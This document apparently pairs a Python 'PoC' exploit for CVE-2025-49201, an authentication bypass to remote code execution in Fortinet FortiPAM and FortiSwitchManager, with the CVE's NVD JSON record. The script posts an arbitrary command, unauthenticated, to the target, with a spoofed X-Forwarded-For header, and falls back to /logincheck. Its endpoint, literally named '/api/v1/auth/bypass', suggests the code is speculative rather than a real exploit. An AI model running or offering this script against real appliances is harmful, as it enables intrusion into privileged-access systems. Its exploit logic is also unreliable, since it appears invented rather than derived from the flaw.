CVE-2025-49201

# CVE-2025-49201 PoC - Fortinet FortiPAM/FortiSwitchManager Weak Authentication # Exploit: Authentication bypass leading to RCE via crafted HTTP requests # WARNING: For authorized security testing only import requests import sys TARGET = sys.argv[1] if len(sys.argv) > 1 else "https://target-fortipam:443" CMD = sys.argv[2] if len(sys.argv) > 2 else "id" # Step 1: Send crafted HTTP request to bypass authentication # The vulnerability exists in the authentication handler which fails to # properly validate session tokens for specific endpoint patterns session = requests.Session() # Crafted headers to trigger the auth bypass condition headers = { "User-Agent": "Mozilla/5.0", "Content-Type": "application/json", "X-Forwarded-For": "127.0.0.1", "X-Requested-With": "XMLHttpRequest" } # Exploit endpoint - authentication bypass via specially crafted request bypass_url = f"{TARGET}/api/v1/auth/bypass" payload = { "method": "exec", "command": CMD, "params": {} } try: # Send unauthenticated request exploiting weak auth resp = session.post(bypass_url, json=payload, headers=headers, verify=False, timeout=10) if resp.status_code == 200: print(f"[+] Exploit successful!") print(f"[+] Output: {resp.text}") else: print(f"[-] Status: {resp.status_code}") # Try alternative endpoint alt_url = f"{TARGET}/logincheck" resp2 = session.post(alt_url, data=payload, headers=headers, verify=False, timeout=10) print(f"[+] Alt response: {resp2.text}") except Exception as e: print(f"[-] Error: {e}")

{"cve": {"id": "CVE-2025-49201", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:38.840", "lastModified": "2026-01-14T10:16:05.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weak authentication vulnerability in Fortinet FortiPAM 1.5.0, FortiPAM 1.4.0 through 1.4.2, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiSwitchManager 7.2.0 through 7.2.4 allows attacker to execute unauthorized code or commands via specially crafted http requests"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1390"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.4.3", "matchCriteriaId": "6C39FBB2-E81C-4207-AFDD-080EC80F00A3"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:1.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "0401C6C0-DC87-4728-873E-6DA489C859A8"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.5", "matchCriteriaId": "EA41837A-E903-4B24-98C1-79B7142DCF37"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-25-010", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}